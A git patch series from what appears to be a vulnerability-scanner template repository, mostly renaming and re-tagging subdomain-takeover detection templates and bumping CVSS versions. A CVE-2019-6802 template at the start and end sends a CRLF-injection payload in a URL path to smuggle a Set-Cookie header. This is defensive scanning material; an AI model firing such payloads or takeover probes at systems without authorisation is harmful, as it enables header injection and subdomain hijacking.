https://vuldb.com/?id.130257 + - https://www.cvedetails.com/cve/CVE-2019-6802/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-6802 + cwe-id: CWE-93 + tags: cve,cve2019,crlf,generic,pypiserver + +requests: + - method: GET + path: + - "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;" + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' From 90573b8d3e226597297f7f45e080b57041f8b573 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 5 Dec 2022 22:47:19 -0500 Subject: [PATCH 0092/1133] Update meteor-takeover.yaml - matching id with file name. --- takeovers/meteor-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/meteor-takeover.yaml b/takeovers/meteor-takeover.yaml index 5f594c0471..d05097abe6 100644 --- a/takeovers/meteor-takeover.yaml +++ b/takeovers/meteor-takeover.yaml @@ -1,4 +1,4 @@ -id: rivalsec-meteor-takeover +id: meteor-takeover info: name: Meteor subdomain takeover From e569c1467e31f96af399ce3661c1ffd50d375058 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Dec 2022 04:18:34 +0000 Subject: [PATCH 0094/1133] Auto Generated CVE annotations [Tue Dec 6 04:18:34 UTC 2022] :robot: --- cves/2019/CVE-2019-3911.yaml | 2 +- cves/2019/CVE-2019-3912.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-3911.yaml b/cves/2019/CVE-2019-3911.yaml index 4a49beede1..debfaab3d3 100644 --- a/cves/2019/CVE-2019-3911.yaml +++ b/cves/2019/CVE-2019-3911.yaml @@ -9,7 +9,7 @@ info: - https://www.tenable.com/security/research/tra-2019-03 - https://nvd.nist.gov/vuln/detail/CVE-2019-3911 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-3911 cwe-id: CWE-79 diff --git a/cves/2019/CVE-2019-3912.yaml b/cves/2019/CVE-2019-3912.yaml index c8e7f22c1b..080ab85add 100644 --- a/cves/2019/CVE-2019-3912.yaml +++ b/cves/2019/CVE-2019-3912.yaml @@ -10,7 +10,7 @@ info: - https://www.cvedetails.com/cve/CVE-2019-3912 - https://nvd.nist.gov/vuln/detail/CVE-2019-3912 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-3912 cwe-id: CWE-601 From 33c8c0e78239e4423637776bae7f7620448b86d8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 5 Dec 2022 23:35:37 -0500 Subject: [PATCH 0095/1133] Update and rename campaignmonitor.yaml to campaignmonitor-takeover.yaml 1. Following filename formatting & id template = filename 2. Added link to github issue --- .../{campaignmonitor.yaml => campaignmonitor-takeover.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename takeovers/{campaignmonitor.yaml => campaignmonitor-takeover.yaml} (83%) diff --git a/takeovers/campaignmonitor.yaml b/takeovers/campaignmonitor-takeover.yaml similarity index 83% rename from takeovers/campaignmonitor.yaml rename to takeovers/campaignmonitor-takeover.yaml index 5582631239..fd45755863 100644 --- a/takeovers/campaignmonitor.yaml +++ b/takeovers/campaignmonitor-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/275 tags: takeover requests: @@ -23,4 +23,4 @@ requests: words: - 'Trying to access your account?' - 'or Date: Mon, 5 Dec 2022 23:39:58 -0500 Subject: [PATCH 0097/1133] Update cargocollective-takeover.yaml --- takeovers/cargocollective-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/cargocollective-takeover.yaml b/takeovers/cargocollective-takeover.yaml index d2a82d8034..6c9e91b93e 100644 --- a/takeovers/cargocollective-takeover.yaml +++ b/takeovers/cargocollective-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/152 tags: takeover requests: @@ -23,4 +23,4 @@ requests: words: - '
' - '404 Not Found
' - condition: and \ No newline at end of file + condition: and From b133a47fcf49e3812dd18ccc8e4a8c1d555b44d5 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 5 Dec 2022 23:44:56 -0500 Subject: [PATCH 0098/1133] Update getresponse-takeover.yaml --- takeovers/getresponse-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/getresponse-takeover.yaml b/takeovers/getresponse-takeover.yaml index 005c64d379..01134f39b3 100644 --- a/takeovers/getresponse-takeover.yaml +++ b/takeovers/getresponse-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/235 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - 'With GetResponse Landing Pages, lead generation has never been easier' \ No newline at end of file + - 'With GetResponse Landing Pages, lead generation has never been easier' From cb3004421a3bc497cb5d9c3cf3937f4d68249d5b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:18:53 +0530 Subject: [PATCH 0101/1133] Update campaignmonitor-takeover.yaml --- takeovers/campaignmonitor-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/campaignmonitor-takeover.yaml b/takeovers/campaignmonitor-takeover.yaml index fd45755863..5bfccd70dc 100644 --- a/takeovers/campaignmonitor-takeover.yaml +++ b/takeovers/campaignmonitor-takeover.yaml @@ -1,12 +1,12 @@ id: campaignmonitor-takeover info: - name: campaignmonitor takeover detection + name: CampaignMonitor Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/275 - tags: takeover + tags: takeover,campaignmonitor requests: - method: GET From 6cbc40cd20419af2bdb02b5cc69d70d886854fe6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:19:10 +0530 Subject: [PATCH 0102/1133] Revert "Update cargocollective-takeover.yaml" --- takeovers/cargocollective-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/cargocollective-takeover.yaml b/takeovers/cargocollective-takeover.yaml index 6c9e91b93e..d2a82d8034 100644 --- a/takeovers/cargocollective-takeover.yaml +++ b/takeovers/cargocollective-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/152 + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover requests: @@ -23,4 +23,4 @@ requests: words: - '
' - '404 Not Found
' - condition: and + condition: and \ No newline at end of file From 0064c2c565d1f2fa67c1457e3eb2c8ad44f9dd50 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 5 Dec 2022 23:49:15 -0500 Subject: [PATCH 0103/1133] Update helprace-takeover.yaml --- takeovers/helprace-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/helprace-takeover.yaml b/takeovers/helprace-takeover.yaml index e7ea585d66..a122264163 100644 --- a/takeovers/helprace-takeover.yaml +++ b/takeovers/helprace-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/115 tags: takeover requests: From 01356a140fd242d1b74c6dad430148bdeb03f9a0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:19:53 +0530 Subject: [PATCH 0104/1133] Update cargocollective-takeover.yaml --- takeovers/cargocollective-takeover.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/takeovers/cargocollective-takeover.yaml b/takeovers/cargocollective-takeover.yaml index d2a82d8034..51cf5894f8 100644 --- a/takeovers/cargocollective-takeover.yaml +++ b/takeovers/cargocollective-takeover.yaml @@ -1,12 +1,12 @@ id: cargocollective-takeover info: - name: cargocollective takeover detection + name: CargoCollective Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover + tags: takeover,cargocollective requests: - method: GET @@ -23,4 +23,4 @@ requests: words: - '
' - '404 Not Found
' - condition: and \ No newline at end of file + condition: and From 1a0f85c8b41c153c4c5136e21bf285009be66bbb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:21:10 +0530 Subject: [PATCH 0105/1133] Update cargocollective-takeover.yaml --- takeovers/cargocollective-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/cargocollective-takeover.yaml b/takeovers/cargocollective-takeover.yaml index 51cf5894f8..4a16ccee73 100644 --- a/takeovers/cargocollective-takeover.yaml +++ b/takeovers/cargocollective-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/152 tags: takeover,cargocollective requests: From 73955315bb6795e0ba9bd94b63e3e9b0657d728a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:23:56 +0530 Subject: [PATCH 0108/1133] Update getresponse-takeover.yaml --- takeovers/getresponse-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/getresponse-takeover.yaml b/takeovers/getresponse-takeover.yaml index 01134f39b3..cc6d0adf85 100644 --- a/takeovers/getresponse-takeover.yaml +++ b/takeovers/getresponse-takeover.yaml @@ -1,12 +1,12 @@ id: getresponse-takeover info: - name: getresponse takeover detection + name: Getresponse Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/235 - tags: takeover + tags: takeover,getresponse requests: - method: GET From d6d1f935ee5b21308033c2a4f23ac0310e2207b3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 5 Dec 2022 23:54:38 -0500 Subject: [PATCH 0109/1133] Update uberflip-takeover.yaml --- takeovers/uberflip-takeover.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/takeovers/uberflip-takeover.yaml b/takeovers/uberflip-takeover.yaml index d058830fbb..49f9775916 100644 --- a/takeovers/uberflip-takeover.yaml +++ b/takeovers/uberflip-takeover.yaml @@ -5,8 +5,9 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/150 + - https://hackerone.com/reports/863551 + tags: takeover,hackerone requests: - method: GET @@ -21,4 +22,4 @@ requests: - type: word words: - - "Non-hub domain, The URL you've accessed does not provide a hub." \ No newline at end of file + - "Non-hub domain, The URL you've accessed does not provide a hub." From 5d5eade13eb8fe281114debd33c8473aad24a36e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:25:32 +0530 Subject: [PATCH 0110/1133] Update helprace-takeover.yaml --- takeovers/helprace-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/helprace-takeover.yaml b/takeovers/helprace-takeover.yaml index a122264163..5da4aca364 100644 --- a/takeovers/helprace-takeover.yaml +++ b/takeovers/helprace-takeover.yaml @@ -1,12 +1,12 @@ id: helprace-takeover info: - name: helprace takeover detection + name: Helprace Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/115 - tags: takeover + tags: takeover,helprace requests: - method: GET From 5c103c0085c6e686aa0db5683e68c63802b0b941 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:27:49 +0530 Subject: [PATCH 0113/1133] Update uberflip-takeover.yaml --- takeovers/uberflip-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/uberflip-takeover.yaml b/takeovers/uberflip-takeover.yaml index 49f9775916..4db92ed09d 100644 --- a/takeovers/uberflip-takeover.yaml +++ b/takeovers/uberflip-takeover.yaml @@ -1,13 +1,13 @@ id: uberflip-takeover info: - name: uberflip takeover detection + name: Uberflip Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/150 - https://hackerone.com/reports/863551 - tags: takeover,hackerone + tags: takeover,uberflip requests: - method: GET From 4c8eaf67a825b99337f3e7669f4cafe6606ef0a8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:04:15 -0500 Subject: [PATCH 0116/1133] Update pingdom-takeover.yaml --- takeovers/pingdom-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/pingdom-takeover.yaml b/takeovers/pingdom-takeover.yaml index 550baa3b6f..ed296f33fc 100644 --- a/takeovers/pingdom-takeover.yaml +++ b/takeovers/pingdom-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/144 tags: takeover requests: @@ -22,4 +22,4 @@ requests: - type: word words: - Public Report Not Activated - - This public report page has not been activated by the user \ No newline at end of file + - This public report page has not been activated by the user From 396ded6fab5f86d6684f963352993e2e917fc43a Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:10:04 -0500 Subject: [PATCH 0117/1133] Update readme-takeover.yaml --- takeovers/readme-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/readme-takeover.yaml b/takeovers/readme-takeover.yaml index 4a0a6191b5..56dc030d30 100644 --- a/takeovers/readme-takeover.yaml +++ b/takeovers/readme-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/41 tags: takeover requests: From bf3e84d419e885e061df3303d7e5828b7db5edde Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:12:53 -0500 Subject: [PATCH 0118/1133] Update airee-takeover.yaml --- takeovers/airee-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/airee-takeover.yaml b/takeovers/airee-takeover.yaml index 42a3ee803e..b0593108e9 100644 --- a/takeovers/airee-takeover.yaml +++ b/takeovers/airee-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/104 tags: takeover requests: @@ -22,4 +22,4 @@ requests: - type: word name: airee words: - - 'Ошибка 402. Сервис Айри.рф не оплачен' \ No newline at end of file + - 'Ошибка 402. Сервис Айри.рф не оплачен' From 532a29f643ebbd49526aa2cb2083f55c4a4b0a3b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:43:10 +0530 Subject: [PATCH 0119/1133] Update pingdom-takeover.yaml --- takeovers/pingdom-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/pingdom-takeover.yaml b/takeovers/pingdom-takeover.yaml index ed296f33fc..ececc6187c 100644 --- a/takeovers/pingdom-takeover.yaml +++ b/takeovers/pingdom-takeover.yaml @@ -1,12 +1,12 @@ id: pingdom-takeover info: - name: pingdom takeover detection + name: Pingdom Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/144 - tags: takeover + tags: takeover,pingdom requests: - method: GET From 825988929c89e091fc33906b862d9f16a29506b9 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:13:43 -0500 Subject: [PATCH 0120/1133] Update heroku-takeover.yaml --- takeovers/heroku-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index 318a0da558..e7ea5e3ac2 100644 --- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml @@ -5,7 +5,7 @@ info: author: 0xPrial,pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/38 tags: takeover,heroku requests: From ebcd6d71a7d09fcd44682b840b20f06506ba4116 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:44:21 +0530 Subject: [PATCH 0121/1133] Update readme-takeover.yaml --- takeovers/readme-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/readme-takeover.yaml b/takeovers/readme-takeover.yaml index 56dc030d30..32d04c7524 100644 --- a/takeovers/readme-takeover.yaml +++ b/takeovers/readme-takeover.yaml @@ -1,12 +1,12 @@ id: readme-takeover info: - name: readme takeover detection + name: Readme Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/41 - tags: takeover + tags: takeover,readme requests: - method: GET From a4cb5039d283d801192b20e3e0b4db22c8a80bf0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Dec 2022 05:14:49 +0000 Subject: [PATCH 0122/1133] Auto Generated CVE annotations [Tue Dec 6 05:14:49 UTC 2022] :robot: --- takeovers/uberflip-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/uberflip-takeover.yaml b/takeovers/uberflip-takeover.yaml index 4db92ed09d..00d35b9299 100644 --- a/takeovers/uberflip-takeover.yaml +++ b/takeovers/uberflip-takeover.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/150 - https://hackerone.com/reports/863551 - tags: takeover,uberflip + tags: takeover,uberflip,hackerone requests: - method: GET From 4648205445f35f614ba1914835bb61e6e434b117 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:45:26 +0530 Subject: [PATCH 0123/1133] Update airee-takeover.yaml --- takeovers/airee-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/airee-takeover.yaml b/takeovers/airee-takeover.yaml index b0593108e9..cc02d0c311 100644 --- a/takeovers/airee-takeover.yaml +++ b/takeovers/airee-takeover.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/104 - tags: takeover + tags: takeover,airee requests: - method: GET From e271c5267ee8ecec136bf4fb8e5155e47dcd8859 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:45:56 +0530 Subject: [PATCH 0124/1133] Update heroku-takeover.yaml --- takeovers/heroku-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index e7ea5e3ac2..9b0c5a41dc 100644 --- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml @@ -1,7 +1,7 @@ id: heroku-takeover info: - name: heroku takeover detection + name: Heroku Takeover Detection author: 0xPrial,pdteam severity: high reference: From d98fd1f1e8a23824d3a22484d62ed013b74158cd Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:16:32 -0500 Subject: [PATCH 0126/1133] Update jetbrains-takeover.yaml --- takeovers/jetbrains-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/jetbrains-takeover.yaml b/takeovers/jetbrains-takeover.yaml index 5bca3b0b3d..dace23fc52 100644 --- a/takeovers/jetbrains-takeover.yaml +++ b/takeovers/jetbrains-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/pull/107 tags: takeover,jetbrains requests: From 9ea8d2c9c84840ce2febca6ca998abd10e3a10ce Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:49:17 +0530 Subject: [PATCH 0130/1133] Update jetbrains-takeover.yaml --- takeovers/jetbrains-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/jetbrains-takeover.yaml b/takeovers/jetbrains-takeover.yaml index dace23fc52..c0aef11af2 100644 --- a/takeovers/jetbrains-takeover.yaml +++ b/takeovers/jetbrains-takeover.yaml @@ -1,7 +1,7 @@ id: jetbrains-takeover info: - name: jetbrains takeover detection + name: Jetbrains Takeover Detection author: pdteam severity: high reference: From 0594ac5871e08db8475e665979e3968a5a5a5412 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:37:44 -0500 Subject: [PATCH 0131/1133] Update readthedocs-takeover.yaml --- takeovers/readthedocs-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/readthedocs-takeover.yaml b/takeovers/readthedocs-takeover.yaml index 667abcee45..66ea3d39fa 100644 --- a/takeovers/readthedocs-takeover.yaml +++ b/takeovers/readthedocs-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/160 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - unknown to Read the Docs \ No newline at end of file + - unknown to Read the Docs From a473bbb48e81cdb4ac5fb7f06913da966ad820a8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:38:41 -0500 Subject: [PATCH 0132/1133] Update ngrok-takeover.yaml --- takeovers/ngrok-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/ngrok-takeover.yaml b/takeovers/ngrok-takeover.yaml index c01e997b90..ea36cdaddb 100644 --- a/takeovers/ngrok-takeover.yaml +++ b/takeovers/ngrok-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/92 tags: takeover requests: @@ -22,4 +22,4 @@ requests: - type: word words: - ngrok.io not found - - Tunnel *.ngrok.io not found \ No newline at end of file + - Tunnel *.ngrok.io not found From 85c2c545077e34282224f5f983edad28b9efca0d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 6 Dec 2022 11:20:42 +0530 Subject: [PATCH 0134/1133] Update ngrok-takeover.yaml --- takeovers/ngrok-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/ngrok-takeover.yaml b/takeovers/ngrok-takeover.yaml index ea36cdaddb..8c10f47d82 100644 --- a/takeovers/ngrok-takeover.yaml +++ b/takeovers/ngrok-takeover.yaml @@ -1,7 +1,7 @@ id: ngrok-takeover info: - name: ngrok takeover detection + name: Ngrok Takeover Detection author: pdteam severity: high reference: From 6a63741ac7972e2de0bd1f02df7d7d9e5e4e0794 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:50:45 -0500 Subject: [PATCH 0135/1133] Update agilecrm-takeover.yaml --- takeovers/agilecrm-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/agilecrm-takeover.yaml b/takeovers/agilecrm-takeover.yaml index f573aaffd5..19f9b5314e 100644 --- a/takeovers/agilecrm-takeover.yaml +++ b/takeovers/agilecrm-takeover.yaml @@ -6,7 +6,7 @@ info: severity: high description: agilecrm subdomain takeover was detected. reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/145 tags: takeover requests: From 8df2af78cf18fc35cd3fa12e0491a476bc53c890 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 11:21:13 +0530 Subject: [PATCH 0136/1133] Update ngrok-takeover.yaml --- takeovers/ngrok-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/ngrok-takeover.yaml b/takeovers/ngrok-takeover.yaml index 8c10f47d82..3614f08b80 100644 --- a/takeovers/ngrok-takeover.yaml +++ b/takeovers/ngrok-takeover.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/92 - tags: takeover + tags: takeover,ngrok requests: - method: GET From 5cae4d7393508f6efe3ce904ea951d82448c95b4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 11:24:01 +0530 Subject: [PATCH 0138/1133] Update agilecrm-takeover.yaml --- takeovers/agilecrm-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/agilecrm-takeover.yaml b/takeovers/agilecrm-takeover.yaml index 19f9b5314e..569c0a2e32 100644 --- a/takeovers/agilecrm-takeover.yaml +++ b/takeovers/agilecrm-takeover.yaml @@ -1,13 +1,13 @@ id: agilecrm-takeover info: - name: agilecrm - Subdomain Takeover Detection + name: Agilecrm Takeover Detection author: pdteam severity: high description: agilecrm subdomain takeover was detected. reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/145 - tags: takeover + tags: takeover,agilecrm requests: - method: GET From 881873448ad0238a27a20c95a11a591cbed57a59 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 11:24:39 +0530 Subject: [PATCH 0139/1133] Update agilecrm-takeover.yaml --- takeovers/agilecrm-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/agilecrm-takeover.yaml b/takeovers/agilecrm-takeover.yaml index 569c0a2e32..60bc6eb785 100644 --- a/takeovers/agilecrm-takeover.yaml +++ b/takeovers/agilecrm-takeover.yaml @@ -1,7 +1,7 @@ id: agilecrm-takeover info: - name: Agilecrm Takeover Detection + name: AgileCRM Takeover Detection author: pdteam severity: high description: agilecrm subdomain takeover was detected. From 7e9631f04fb469e82c5b7ed0e01a23cbcf2ad170 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 6 Dec 2022 11:25:24 +0530 Subject: [PATCH 0140/1133] Update readthedocs-takeover.yaml --- takeovers/readthedocs-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/readthedocs-takeover.yaml b/takeovers/readthedocs-takeover.yaml index 66ea3d39fa..a45cbee7da 100644 --- a/takeovers/readthedocs-takeover.yaml +++ b/takeovers/readthedocs-takeover.yaml @@ -1,12 +1,12 @@ id: readthedocs-takeover info: - name: readthedocs takeover detection + name: Read the Docs Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/160 - tags: takeover + tags: takeover,readthedocs requests: - method: GET From b2668c30ebac4a5b253a5e303a6e08e0bbd9a00e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 11:55:31 +0530 Subject: [PATCH 0144/1133] Update CVE-2019-6802.yaml --- CVE-2019-6802.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/CVE-2019-6802.yaml b/CVE-2019-6802.yaml index a9848720e7..15c993a74b 100644 --- a/CVE-2019-6802.yaml +++ b/CVE-2019-6802.yaml @@ -9,18 +9,16 @@ info: - https://vuldb.com/?id.130257 - https://www.cvedetails.com/cve/CVE-2019-6802/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 cve-id: CVE-2019-6802 - cwe-id: CWE-93 tags: cve,cve2019,crlf,generic,pypiserver requests: - method: GET path: - "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;" + matchers: - - type: regex + - type: word part: header - regex: - - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' + words: + - 'Set-Cookie: crlfinjection=1;' From 